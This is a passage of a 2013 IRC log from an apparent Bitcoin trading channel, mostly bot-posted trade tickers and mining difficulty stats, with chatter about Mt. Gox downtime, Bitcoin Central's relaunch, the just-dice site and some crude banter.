21:33:43 giga has a minirig running I think Jun 23 21:35:14 http://kcmo2.gigamining.com Jun 23 21:35:18 yeah he has 3 running Jun 23 21:35:49 = to one original minirig Jun 23 21:37:32 [BTCTC] [DMS.MINING] 1 @ 0.02037 BTC [-] Jun 23 21:39:54 ;;diff Jun 23 21:39:57 1.933925827238668E7 Jun 23 21:43:17 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1981 BTC [-] Jun 23 21:49:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1996 BTC [+] Jun 23 21:50:37 [BTCTC] [DMS.MINING] 1 @ 0.01601 BTC [-] Jun 23 21:53:34 [BTCTC] [TAT.ASICMINER] 11 @ 0.03299 = 0.3629 BTC [-] Jun 23 21:53:36 [BTCTC] [TAT.ASICMINER] 68 @ 0.032999 = 2.2439 BTC [+] Jun 23 21:58:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.033 = 0.165 BTC [+] Jun 23 21:58:47 [MPEX] [S.MPOE] 13850 @ 0.00079 = 10.9415 BTC [+] Jun 23 22:00:14 [BTCTC] [CRYPTO-TRADE] 4 @ 0.199 = 0.796 BTC [-] Jun 23 22:01:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.03299 BTC [-] Jun 23 22:01:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03298 BTC [-] Jun 23 22:01:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.03297 BTC [-] Jun 23 22:01:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.03296 BTC [-] Jun 23 22:01:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.03295 BTC [-] Jun 23 22:01:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0329 BTC [-] Jun 23 22:01:36 [BTCTC] [GSDPT] 5 @ 0.002299 = 0.0115 BTC [+] Jun 23 22:02:58 ;;bc,stats Jun 23 22:03:00 Current Blocks: 242991 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 944 blocks | Next Difficulty In About: 5 days, 7 hours, 59 minutes, and 59 seconds | Next Difficulty Estimate: 20913281.2904 | Estimated Percent Change: 8.139 Jun 23 22:04:56 we may see .0008 soon jurov Jun 23 22:07:56 hi thestringpuller, if you said we may see 0.001, now that would be something Jun 23 22:09:51 because of http://bitbet.us/bet/153/s-mpoe-will-rise-this-spring/ ... but my bet there is of token variety anyway Jun 23 22:10:10 mircea_popescu: and the 240V didn't solve it either! :< Jun 23 22:11:04 can't yhou just replace the psu ? Jun 23 22:11:10 shitty chinese cheap crap Jun 23 22:11:24 in theory, but it's $1000 worth of PSUs! Jun 23 22:11:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004335 BTC [-] Jun 23 22:11:38 ya well. it's only money. Jun 23 22:11:57 that's a day of mining Jun 23 22:17:10 [BTCTC] [ASICMINER-PT] 1 @ 3.24 BTC [-] Jun 23 22:18:16 [BTCTC] [ASICMINER-PT] 1 @ 3.32 BTC [+] Jun 23 22:25:25 [BTCTC] [B.YABMC] 1 @ 0.004005 BTC [-] Jun 23 22:26:57 [BTCTC] [BASIC-MINING] 1 @ 1.000001 BTC [-] Jun 23 22:30:12 hahahahaha http://www.reddit.com/r/Bitcoin/comments/1gwuql/bitcoin_foundation_gets_cease_an_desist_order_for/ Jun 23 22:30:32 just now seeing that jurov? Jun 23 22:30:42 sry if it was posted already, i'm getting up to speed with btcworld Jun 23 22:31:10 was away in the wilderness to refill mana points Jun 23 22:31:47 [BTCTC] [BASIC-MINING] 1 @ 1.000001 BTC [-] Jun 23 22:33:16 [BTCTC] [ASICMINER-PT] 1 @ 3.23 BTC [-] Jun 23 22:35:23 [BTCTC] [ASICMINER-PT] 1 @ 3.23 BTC [-] Jun 23 22:35:28 [HAVELOCK] [ASICM] 30 @ 0.031979 = 0.9594 BTC [+] Jun 23 22:35:36 [BTCTC] [DMS.PURCHASE] 1 @ 0.054062 BTC [-] Jun 23 22:35:49 [BTCTC] [ASICMINER-PT] 1 @ 3.24 BTC [+] Jun 23 22:36:16 [BTCTC] [DMS.PURCHASE] 20 @ 0.054062 = 1.0812 BTC [-] Jun 23 22:38:01 [BTCTC] [ASICMINER-PT] 1 @ 3.227 BTC [-] Jun 23 22:39:23 [BTCTC] [DMS.SELLING] 10 @ 0.0401 = 0.401 BTC [-] Jun 23 22:39:51 [BTCTC] [TAT.ASICMINER] 20 @ 0.0329 = 0.658 BTC [-] Jun 23 22:39:53 [BTCTC] [TAT.ASICMINER] 25 @ 0.0329 = 0.8225 BTC [-] Jun 23 22:40:24 [BTCTC] [ASICMINER-PT] 1 @ 3.22 BTC [-] Jun 23 22:40:46 [BTCTC] [DMS.MINING] 1 @ 0.01894 BTC [+] Jun 23 22:41:17 [BTCTC] [DMS.MINING] 1 @ 0.01895 BTC [+] Jun 23 22:41:44 [BTCTC] [TAT.ASICMINER] 60 @ 0.03276 = 1.9656 BTC [-] Jun 23 22:43:22 jarpiain jborkl jcpham Jezzz joeykrim jordandotdev jurov JWU42 Jun 23 22:43:22 jarpiain jborkl jcpham Jezzz joeykrim jordandotdev jurov JWU42 Jun 23 22:43:25 lol jurov Jun 23 22:43:45 [MPEX] [S.MPOE] 1753 @ 0.00079 = 1.3849 BTC [+] Jun 23 22:45:16 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1997 = 0.3994 BTC [+] Jun 23 22:46:21 [BTCTC] [TAT.ASICMINER] 30 @ 0.0322 = 0.966 BTC [-] Jun 23 22:47:09 [BTCTC] [ASICMINER-PT] 1 @ 3.22 BTC [-] Jun 23 22:48:07 [BTCTC] [ASICMINER-PT] 1 @ 3.23 BTC [+] Jun 23 22:48:19 [BTCTC] [BASIC-MINING] 1 @ 1.01 BTC [+] Jun 23 22:50:22 [BTCTC] [TAT.ASICMINER] 15 @ 0.033 = 0.495 BTC [+] Jun 23 22:50:22 [BTCTC] [BASIC-MINING] 1 @ 1.099999 BTC [+] Jun 23 22:50:24 [BTCTC] [TAT.ASICMINER] 12 @ 0.033 = 0.396 BTC [+] Jun 23 22:50:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.033 = 0.099 BTC [+] Jun 23 22:51:03 [BTCTC] [ASICMINER-PT] 1 @ 3.2889 BTC [+] Jun 23 22:51:12 [BTCTC] [ASICMINER-PT] 1 @ 3.2889 BTC [+] Jun 23 22:52:01 [BTCTC] [ASICMINER-PT] 1 @ 3.2889 BTC [+] Jun 23 22:54:12 mircea_popescu: the anti-wilderness guy Jun 23 22:54:16 [BTCTC] [DMS.SELLING] 1 @ 0.03987 BTC [-] Jun 23 22:54:22 he may look good in a suit, but with a mustache not so much Jun 23 22:59:09 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Jun 23 23:03:32 [HAVELOCK] [ASICM] 1 @ 0.031979 BTC [+] Jun 23 23:03:56 [BTCTC] [S.DICE-PT] 1 @ 0.002671 BTC [+] Jun 23 23:04:34 [HAVELOCK] [ASICM] 1 @ 0.031979 BTC [+] Jun 23 23:05:19 oh man gox is down hard Jun 23 23:07:26 huh? Jun 23 23:10:23 i just got a 502 bad gateway off their main url, and checked it with downforeveryone and some proxied tunnels. i can't see gox. Jun 23 23:10:24 [HAVELOCK] [ASICM] 8 @ 0.0319 = 0.2552 BTC [-] Jun 23 23:11:41 ah Jun 23 23:11:48 Temporarily unavailable We are currently experiencing technical issues. More information will be available soon. Jun 23 23:11:58 "we're taking all of your money. brb." Jun 23 23:11:59 this is why you pull your coins off Jun 23 23:12:09 when they suspend withdrawls Jun 23 23:12:10 aww Jun 23 23:12:19 [BTCTC] [GSDPT] 115 @ 0.0023 = 0.2645 BTC [+] Jun 23 23:12:23 [BTCTC] [GSDPT] 45 @ 0.00249 = 0.1121 BTC [+] Jun 23 23:12:29 Still have $15,000 in wires I'm waiting on from them Jun 23 23:13:33 sorry to hear that. Jun 23 23:14:48 meh Jun 23 23:14:54 I assume they will show up eventually Jun 23 23:15:09 no rush Jun 23 23:15:23 hey is there a bitcoin-space wide ddos going on right now? Jun 23 23:16:11 [HAVELOCK] [ASICM] 2 @ 0.0319 = 0.0638 BTC [-] Jun 23 23:16:48 [BTCTC] [ASICMINER-PT] 1 @ 3.29999 BTC [+] Jun 23 23:17:25 [BTCTC] [TAT.ASICMINER] 32 @ 0.033 = 1.056 BTC [+] Jun 23 23:17:49 [HAVELOCK] [ASICM] 137 @ 0.03198 = 4.3813 BTC [+] Jun 23 23:19:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [+] Jun 23 23:19:35 mircea_popescu should use the bane line with bankers when they try to c&d MPEX Jun 23 23:19:41 "do you feel in charge?!?!?!?" Jun 23 23:20:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.032551 = 0.1302 BTC [-] Jun 23 23:20:06 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003499 = 0.0105 BTC [-] Jun 23 23:20:08 [BTCTC] [TAT.VIRTUALMINE] 168 @ 0.003461 = 0.5814 BTC [-] Jun 23 23:20:28 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003461 = 0.0173 BTC [-] Jun 23 23:21:04 benkay sorta been going on since march Jun 23 23:21:59 You remind me of Bane mircea_popescu Jun 23 23:22:20 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.003461 = 0.0796 BTC [-] Jun 23 23:22:31 [BTCTC] [DMS.SELLING] 31 @ 0.03987 = 1.236 BTC [-] Jun 23 23:22:55 who;'s bane ? Jun 23 23:24:05 [BTCTC] [ASICMINER-PT] 1 @ 3.319 BTC [+] Jun 23 23:24:26 [BTCTC] [TAT.ASICMINER] 18 @ 0.033 = 0.594 BTC [+] Jun 23 23:25:13 [BTCTC] [TAT.VIRTUALMINE] 151 @ 0.003461 = 0.5226 BTC [-] Jun 23 23:26:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.032551 = 0.1628 BTC [-] Jun 23 23:27:16 [BTCTC] [ASICMINER-PT] 1 @ 3.3199 BTC [+] Jun 23 23:27:18 [BTCTC] [ASICMINER-PT] 1 @ 3.32 BTC [+] Jun 23 23:27:28 [BTCTC] [BTC-BOND] 21 @ 0.009998 = 0.21 BTC [+] Jun 23 23:28:50 [BTCTC] [RSM] 1 @ 0.024997 BTC [-] Jun 23 23:30:41 https://www.youtube.com/watch?v=bCXTu5jE-Ng Jun 23 23:30:42 Do you feel in charge? - YouTube Jun 23 23:30:49 mircea_popescu ^^ Jun 23 23:31:00 usb miners are half price now. hahaha Jun 23 23:31:18 aha Jun 23 23:32:01 still too expencive Jun 23 23:35:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004199 BTC [+] Jun 23 23:36:04 [BTCTC] [DMS.MINING] 1 @ 0.01811 BTC [-] Jun 23 23:37:02 [BTCTC] [DMS.MINING] 12 @ 0.01811 = 0.2173 BTC [-] Jun 23 23:50:47 [MPEX] [S.MPOE] 8200 @ 0.00079 = 6.478 BTC [+] Jun 23 23:50:53 [HAVELOCK] [VTX] 52 @ 0.444499 = 23.1139 BTC [+] Jun 23 23:51:11 [HAVELOCK] [ASICM] 6 @ 0.03198 = 0.1919 BTC [+] Jun 24 00:03:35 [BTCTC] [ASICMINER-PT] 1 @ 3.324 BTC [+] Jun 24 00:05:33 [BTCTC] [TAT.ASICMINER] 8 @ 0.032999 = 0.264 BTC [+] Jun 24 00:05:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.03265 = 0.0653 BTC [-] Jun 24 00:07:29 [BTCTC] [DMS.SELLING] 18 @ 0.03987 = 0.7177 BTC [-] Jun 24 00:08:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.03265 = 0.0653 BTC [-] Jun 24 00:10:05 [MPEX] [S.MPOE] 3400 @ 0.00079 = 2.686 BTC [+] Jun 24 00:18:12 [BTCTC] [BASIC-MINING] 1 @ 1.099999 BTC [+] Jun 24 00:22:34 [BTCTC] [ASICMINER-PT] 1 @ 3.2661 BTC [-] Jun 24 00:22:36 [BTCTC] [ASICMINER-PT] 5 @ 3.266 = 16.33 BTC [-] Jun 24 00:22:37 [BTCTC] [ASICMINER-PT] 1 @ 3.265301 BTC [-] Jun 24 00:22:38 [BTCTC] [ASICMINER-PT] 1 @ 3.2653 BTC [-] Jun 24 00:22:40 [BTCTC] [ASICMINER-PT] 1 @ 3.265211 BTC [-] Jun 24 00:22:41 [BTCTC] [ASICMINER-PT] 3 @ 3.265 = 9.795 BTC [-] Jun 24 00:22:43 [BTCTC] [ASICMINER-PT] 1 @ 3.262 BTC [-] Jun 24 00:22:44 [BTCTC] [ASICMINER-PT] 4 @ 3.25 = 13 BTC [-] Jun 24 00:22:46 [BTCTC] [ASICMINER-PT] 1 @ 3.2301 BTC [-] Jun 24 00:22:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.032999 BTC [+] Jun 24 00:23:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [+] Jun 24 00:23:01 [BTCTC] [TAT.ASICMINER] 8 @ 0.0333 = 0.2664 BTC [+] Jun 24 00:24:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0333 BTC [+] Jun 24 00:26:57 [BTCTC] [S.MPOE-PT] 8 @ 0.000777 = 0.0062 BTC [-] Jun 24 00:29:23 [BTCTC] [ASICMINER-PT] 2 @ 3.230001 = 6.46 BTC [-] Jun 24 00:31:00 [BTCTC] [ASICMINER-PT] 4 @ 3.23 = 12.92 BTC [-] Jun 24 00:31:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.033295 = 0.0666 BTC [-] Jun 24 00:32:14 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jun 24 00:32:16 [BTCTC] [ASICMINER-PT] 4 @ 3.2 = 12.8 BTC [-] Jun 24 00:32:47 Hm, found so far 2 inquiries about coinbr since Thu. Seems people ask about it only when i'm not online. Jun 24 00:33:03 [BTCTC] [ASICMINER-PT] 2 @ 3.198001 = 6.396 BTC [-] Jun 24 00:33:21 [BTCTC] [ASICMINER-PT] 5 @ 3.198 = 15.99 BTC [-] Jun 24 00:34:32 [HAVELOCK] [ASICM] 67 @ 0.03199999 = 2.144 BTC [+] Jun 24 00:35:22 [BTCTC] [GSDPT] 1 @ 0.00249 BTC [+] Jun 24 00:36:22 [BTCTC] [GSDPT] 8 @ 0.00249 = 0.0199 BTC [+] Jun 24 00:38:31 jurov: welcome to the club :-) Jun 24 00:39:01 davout: how so? Jun 24 00:39:54 "Seems people ask about it only when i'm not online." <-- we get tons of emails "where is the deposit button" even though our service is interrupted :-) Jun 24 00:41:39 sooo... just-dice investment return after 24 hours : 1.011503024% Jun 24 00:41:50 not even making this shit up. Jun 24 00:41:56 what's Up w asic miner going up so much recently? Jun 24 00:42:27 full moon Jun 24 00:42:46 dub has it. Jun 24 00:50:08 Jurov, where are the iDiff-Es? << haha impatient? it won't be so easy this time Jun 24 00:54:35 ;;asks 11111111111111111 Jun 24 00:55:03 [MPEX] [S.MPOE] 26577 @ 0.00079 = 20.9958 BTC [+] Jun 24 00:56:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.0329 = 0.0658 BTC [-] Jun 24 00:56:34 this just dice thing is really nice Jun 24 00:57:01 how does it track your account though ? seems it just asks for a user name and that's it Jun 24 00:57:31 ;;ticker Jun 24 00:57:46 it uses the secret link trick patentged by some wallet-something guys Jun 24 00:58:17 haha fuck you Jun 24 00:58:25 [HAVELOCK] [ASICM] 8 @ 0.0317 = 0.2536 BTC [-] Jun 24 00:58:26 [HAVELOCK] [ASICM] 48 @ 0.031 = 1.488 BTC [-] Jun 24 00:58:27 [HAVELOCK] [ASICM] 200 @ 0.031 = 6.2 BTC [-] Jun 24 00:58:28 [HAVELOCK] [ASICM] 10 @ 0.03001001 = 0.3001 BTC [-] Jun 24 00:58:29 but srsly, cookies, secret link and you can set up an acct name/pw Jun 24 00:58:29 [HAVELOCK] [ASICM] 37 @ 0.03001 = 1.1104 BTC [-] Jun 24 00:58:30 [HAVELOCK] [ASICM] 5 @ 0.0300001 = 0.15 BTC [-] Jun 24 00:58:31 [HAVELOCK] [ASICM] 16 @ 0.03 = 0.48 BTC [-] Jun 24 00:58:32 [HAVELOCK] [ASICM] 146 @ 0.03 = 4.38 BTC [-] Jun 24 00:58:33 [HAVELOCK] [ASICM] 500 @ 0.03 = 15 BTC [-] Jun 24 00:58:34 [HAVELOCK] [ASICM] 20 @ 0.02981001 = 0.5962 BTC [-] Jun 24 00:58:34 which disables the secret l;ink Jun 24 00:58:35 [HAVELOCK] [ASICM] 9 @ 0.02981 = 0.2683 BTC [-] Jun 24 00:58:36 [HAVELOCK] [ASICM] 5 @ 0.02951 = 0.1476 BTC [-] Jun 24 00:58:36 [HAVELOCK] [ASICM] 1 @ 0.0295001 BTC [-] Jun 24 00:58:37 [HAVELOCK] [ASICM] 3 @ 0.02950001 = 0.0885 BTC [-] Jun 24 00:58:38 [HAVELOCK] [ASICM] 14 @ 0.0295 = 0.413 BTC [-] Jun 24 00:58:39 i clicked on "account" which answered my question Jun 24 00:58:39 [HAVELOCK] [ASICM] 1 @ 0.0294 BTC [-] Jun 24 00:58:40 [HAVELOCK] [ASICM] 3 @ 0.02930001 = 0.0879 BTC [-] Jun 24 00:58:41 [HAVELOCK] [ASICM] 475 @ 0.0293 = 13.9175 BTC [-] Jun 24 00:58:42 [HAVELOCK] [ASICM] 319 @ 0.0293 = 9.3467 BTC [-] Jun 24 00:58:44 davout: Any ETA on the relaunch of bitcoin central ? Jun 24 00:58:52 samson_: yes Jun 24 00:59:01 he said 2 weeks yest. Jun 24 00:59:08 i did not Jun 24 00:59:24 i don't want to pay fucking royalties Jun 24 00:59:52 Ok, when will it be operational again ? Jun 24 01:01:11 ;;nethash Jun 24 01:01:27 he said 2 weeks yest. Jun 24 01:01:33 i did not Jun 24 01:01:34 C'mon, Gribble. Why U die on me? I want my money back! Jun 24 01:01:51 samson_: target is mid-july Jun 24 01:02:11 Ok thanks, I'll use it again ! Jun 24 01:02:28 [MPEX] [S.MPOE] 9000 @ 0.00079 = 7.11 BTC [+] Jun 24 01:02:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.03265 BTC [-] Jun 24 01:02:52 the "exception culturelle" mandates us to do things slightly differently than everyone else and feel superior about it, which is why we picked three weeks instead of two Jun 24 01:02:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.0326 = 0.163 BTC [-] Jun 24 01:03:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03259 BTC [-] Jun 24 01:03:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.03255 BTC [-] Jun 24 01:03:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0325 BTC [-] Jun 24 01:03:21 samson_: if it's not mid-july it will have to wait until beginning of september, for reasons i won't go into Jun 24 01:03:43 Ok, I'll keep my eye on the situation Jun 24 01:07:14 samson_: are you already registered ? Jun 24 01:07:34 samson_: if so would you find it spammy if we notified you by e-mail ? Jun 24 01:08:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03245 BTC [-] Jun 24 01:09:24 davout: I'm already registered and no I would not find it spammy - I would find it very useful Jun 24 01:09:52 samson_: ok, thanks, i think we'll e-mail all users with a non-zero balance then :-) Jun 24 01:10:19 [BTCTC] [TAT.ASICMINER] 19 @ 0.032351 = 0.6147 BTC [-] Jun 24 01:12:35 users still have balances? I tought everyone transfered the money back Jun 24 01:12:50 anyway, I have a zero balance *now* but as I used the site I would like to get the mail too Jun 24 01:13:15 pankkake: you probably have some dust, which would count as non-zero Jun 24 01:13:37 "And I sincerely believe, with you, that banking establishments are more dangerous than standing armies;" T. Jefferson Jun 24 01:14:16 pankkake: well, funnily enough, we got a ton of positive feedback from our "let's refund everyone" thing, and lots of people asked us whether they could leave their balances with us Jun 24 01:15:05 given I paid fees on my very little transaction (I planned to sell the rest for bitcoins but bad timing…) I wish I left it Jun 24 01:15:09 furuknap: yes, that's why balls of iron/carbon alloy are required Jun 24 01:15:11 I thought it was mandatory Jun 24 01:15:31 [BTCTC] [GSDPT] 30 @ 0.00249 = 0.0747 BTC [+] Jun 24 01:15:48 [BTCTC] [TAT.ASICMINER] 8 @ 0.032695 = 0.2616 BTC [+] Jun 24 01:15:51 [BTCTC] [TAT.ASICMINER] 15 @ 0.032351 = 0.4853 BTC [-] Jun 24 01:16:28 [BTCTC] [S.MPOE-PT] 3 @ 0.000777 = 0.0023 BTC [-] Jun 24 01:16:31 pankkake: technically, from a purely legal PoV it was mandatory for us to refund everyone. but practically speaking it's not an issue Jun 24 01:16:56 ;;nethash Jun 24 01:17:49 [BTCTC] [DMS.MINING] 6 @ 0.01879 = 0.1127 BTC [+] Jun 24 01:17:55 149421.171827 Jun 24 01:18:54 [BTCTC] [S.DICE-PT] 8 @ 0.002671 = 0.0214 BTC [+] Jun 24 01:19:53 pankkake: well, funnily enough, we got a ton of positive feedback from our "let's refund everyone" thing, and lots of people asked us whether they could leave their balances with us << right way to go. Jun 24 01:20:54 "She says she was attempting to unveil a massive cover-up, that went all the way to Congress, and included 188 ministers of finance around the world. She claims the result of all the corruption will be a currency war." Jun 24 01:20:58 http://guardianlv.com/2013/06/world-bank-corruption-deceit-and-greed/ Jun 24 01:21:00 World Bank Corruption Deceit and Greed | The Guardian Express Jun 24 01:21:05 Is S.MPOE about to break ATH? Jun 24 01:21:29 furuknap: "currency" is so 2012, bitcoin is about "money", not "currency" Jun 24 01:21:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.032699 = 0.1635 BTC [+] Jun 24 01:22:01 Well, tell that to her, I'm sure she'll update her statement to "money war" :-) Jun 24 01:22:12 furuknap: :-) Jun 24 01:24:08 i think 79 is ath alrady Jun 24 01:24:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0324 BTC [-] Jun 24 01:24:34 [BTCTC] [TAT.ASICMINER] 16 @ 0.032351 = 0.5176 BTC [-] Jun 24 01:24:36 [BTCTC] [TAT.ASICMINER] 8 @ 0.032351 = 0.2588 BTC [-] Jun 24 01:24:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.03221 = 0.0644 BTC [-] Jun 24 01:24:40 [BTCTC] [TAT.ASICMINER] 47 @ 0.0322 = 1.5134 BTC [-] Jun 24 01:26:29 [BTCTC] [DMS.MINING] 3 @ 0.01879 = 0.0564 BTC [+] Jun 24 01:26:31 [BTCTC] [DMS.MINING] 10 @ 0.01879 = 0.1879 BTC [+] Jun 24 01:27:29 [BTCTC] [DMS.MINING] 31 @ 0.01879 = 0.5825 BTC [+] Jun 24 01:27:31 [BTCTC] [PAJKA.BOND] 2 @ 0.0545 = 0.109 BTC [-] Jun 24 01:27:36 [BTCTC] [DMS.MINING] 50 @ 0.0188 = 0.94 BTC [+] Jun 24 01:28:08 [BTCTC] [DMS.SELLING] 10 @ 0.04015 = 0.4015 BTC [+] Jun 24 01:28:15 [BTCTC] [ASICMINER-PT] 1 @ 3.2939 BTC [+] Jun 24 01:29:51 [BTCTC] [DMS.MINING] 22 @ 0.0188 = 0.4136 BTC [+] Jun 24 01:31:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.032699 = 0.654 BTC [+] Jun 24 01:38:42 [BTCTC] [PAJKA.BOND] 5 @ 0.049014 = 0.2451 BTC [-] Jun 24 01:41:39 [BTCTC] [PAJKA.BOND] 1 @ 0.049014 BTC [-] Jun 24 01:46:11 [BTCTC] [ASICMINER-PT] 1 @ 3.293669 BTC [-] Jun 24 01:48:34 [HAVELOCK] [ASICM] 117 @ 0.030999 = 3.6269 BTC [+] Jun 24 01:48:36 [HAVELOCK] [ASICM] 300 @ 0.031 = 9.3 BTC [+] Jun 24 02:01:55 [BTCTC] [TAT.ASICMINER] 35 @ 0.0327 = 1.1445 BTC [+] Jun 24 02:07:20 [BTCTC] [BITVPS] 35 @ 0.001199 = 0.042 BTC [-] Jun 24 02:07:59 this dude has been riding my ass all day, and now he goes and scams his way out of his underprice AM auction https://bitcointalk.org/index.php?topic=236608.msg2558324#msg2558324 Jun 24 02:08:36 really puts a black mark on the whole anal thing Jun 24 02:08:39 [BTCTC] [PAJKA.BOND] 4 @ 0.049014 = 0.1961 BTC [-] Jun 24 02:09:46 ? Jun 24 02:10:17 "riding my ass all day" Jun 24 02:10:27 lol Jun 24 02:10:47 [HAVELOCK] [ASICM] 4 @ 0.03000001 = 0.12 BTC [-] Jun 24 02:10:58 i'm tempted to make a large bid Jun 24 02:11:10 certainly a scammer tag is warranted Jun 24 02:11:25 fits the profile... make a committment, don't follow through Jun 24 02:11:46 ThickAsThieves that's ok, sorta like how eskimo bob rants about miners Jun 24 02:11:56 while runnign some clay oven "asset" Jun 24 02:12:29 i guess what they say is often true, Jun 24 02:12:44 the most untrusting people, are the least trustworthy Jun 24 02:12:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.03265 BTC [-] Jun 24 02:14:22 maybe flip that around slightly -- untrustworty people are often also untrusting people Jun 24 02:14:50 indeed Jun 24 02:14:57 some people are just paranoid Jun 24 02:14:59 :) Jun 24 02:15:05 [BTCTC] [COGNITIVE] 1 @ 0.310002 BTC [-] Jun 24 02:15:07 [BTCTC] [COGNITIVE] 5 @ 0.310001 = 1.55 BTC [-] Jun 24 02:15:09 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Jun 24 02:15:12 [BTCTC] [COGNITIVE] 19 @ 0.31 = 5.89 BTC [-] Jun 24 02:15:18 paranoia is worth promoting in this environment Jun 24 02:15:40 at the very least, super abrasive skepticism Jun 24 02:15:55 i think aknap3's form is the more accurate. Jun 24 02:16:50 mp: any thoughts on the ass riding? Jun 24 02:17:15 [BTCTC] [TAT.ASICMINER] 35 @ 0.03265 = 1.1428 BTC [-] Jun 24 02:17:18 mp predicted i'd be ridden hard and put away wet Jun 24 02:17:25 he was right of course Jun 24 02:17:50 Hey, who knows, maybe he bet money on it :) Jun 24 02:18:15 ** always have more fun than you're supposed to ** Jun 24 02:18:16 [HAVELOCK] [ASICM] 16 @ 0.03179999 = 0.5088 BTC [+] Jun 24 02:20:26 lol Jun 24 02:22:49 ;;estimate Jun 24 02:22:55 .d Jun 24 02:22:57 19339258.27239 | Next Diff in 919 blocks | Estimated Change: 7.8329% in 5d 20h 54m 2s Jun 24 02:23:32 Next difficulty estimate | None based on data since last change | 23250135.4799 based on data for last three days Jun 24 02:26:51 [BTCTC] [TAT.ASICMINER] 64 @ 0.03265 = 2.0896 BTC [-] Jun 24 02:32:18 .bait Jun 24 02:32:23 http://25.media.tumblr.com/af6e4ed04789bec23bc6655fcb56d714/tumblr_mg5ublvKE81rmir0fo1_500.jpg Jun 24 02:32:26 http://24.media.tumblr.com/tumblr_mcoor3YEGZ1r3khrvo1_1280.jpg Jun 24 02:32:31 i win. Jun 24 02:33:22 $avg Jun 24 02:33:26 .h Jun 24 02:33:30 All commands can be processed in channel or in PM Jun 24 02:33:30 Commands: .bait .count .diff .earn .exchange .nethash .rates .lcrates .tslb Jun 24 02:33:35 .exchange Jun 24 02:33:36 Usage: exchange [amount] [currency_from] [currency_to] Jun 24 02:33:42 .rates Jun 24 02:33:45 Gox | Buy: $107.60 Sell: $108.00 Last: $107.60 High: $109.00 Low: $106.20 Jun 24 02:33:45 Weex | API Error Jun 24 02:34:36 any recommendations for a BTC/USD price avg? Jun 24 02:34:44 gox is obv not real Jun 24 02:34:49 aw shit Jun 24 02:34:52 .bait Jun 24 02:34:56 http://25.media.tumblr.com/tumblr_m9rx5wWC4X1qzxg13o1_1280.png Jun 24 02:35:08 i still win. Jun 24 02:35:09 hory shet Jun 24 02:35:25 ThickAsThieves 100 works. Jun 24 02:36:17 .bait Jun 24 02:36:21 http://24.media.tumblr.com/tumblr_mea8ljUmM01qj4t1so1_1280.jpg Jun 24 02:36:34 INFINITE PORN Jun 24 02:37:20 .bait Jun 24 02:37:23 http://25.media.tumblr.com/tumblr_mbc6ijy39H1qlkwlio1_1280.jpg Jun 24 02:37:25 .bait Jun 24 02:37:27 (which ranks just below infinite cocaine and infinite money) Jun 24 02:37:31 http://25.media.tumblr.com/tumblr_me94bgZ4xR1rgzedoo1_500.jpg Jun 24 02:37:39 there should be a fee fr this. Jun 24 02:38:00 o hey, nice boobies on tghe 2nd one. Jun 24 02:38:29 this probably warrants a topic change Jun 24 02:38:54 [MPEX] [S.MPOE] 6315 @ 0.00079 = 4.9889 BTC [+] Jun 24 02:38:55 http://i.minus.com/ib1QvpckcQuQZE.gif Jun 24 02:38:56 [MPEX] [S.MPOE] 1985 @ 0.00079026 = 1.5687 BTC [+] Jun 24 02:39:17 [BTCTC] [PAJKA.BOND] 5 @ 0.049014 = 0.2451 BTC [-] Jun 24 02:39:21 so this fucking dice site STOLE like 2 btc from me. and i wasn;'t even betting. OMG Jun 24 02:39:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003785 BTC [-] Jun 24 02:39:42 wut? Jun 24 02:40:00 this new scam in town called investing. worst fucking idea ever Jun 24 02:40:28 proceed Jun 24 02:40:54 you know, you put your HARD EARNED bitcoin on the line and other people bet Jun 24 02:40:58 then they win :/ Jun 24 02:41:31 stupid laws of mathematics Jun 24 02:41:33 [BTCTC] [ASICMINER-PT] 1 @ 3.29 BTC [-] Jun 24 02:41:42 so this guy goes into a restaurant Jun 24 02:41:51 mp, you dont have to stand for it Jun 24 02:41:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.0327 = 0.327 BTC [+] Jun 24 02:41:54 expects a friend of his to join him for dinner Jun 24 02:41:57 whenever you make a bad investment Jun 24 02:42:00 just hit the forums Jun 24 02:42:04 ThickAsThieves i know right ? i demand my negative ev back! Jun 24 02:42:04 and tell everyone Jun 24 02:42:09 summons the waitress and tells her Jun 24 02:42:21 summoned waitresses. yum Jun 24 02:42:27 "i'll give you an extra $20 on your tip 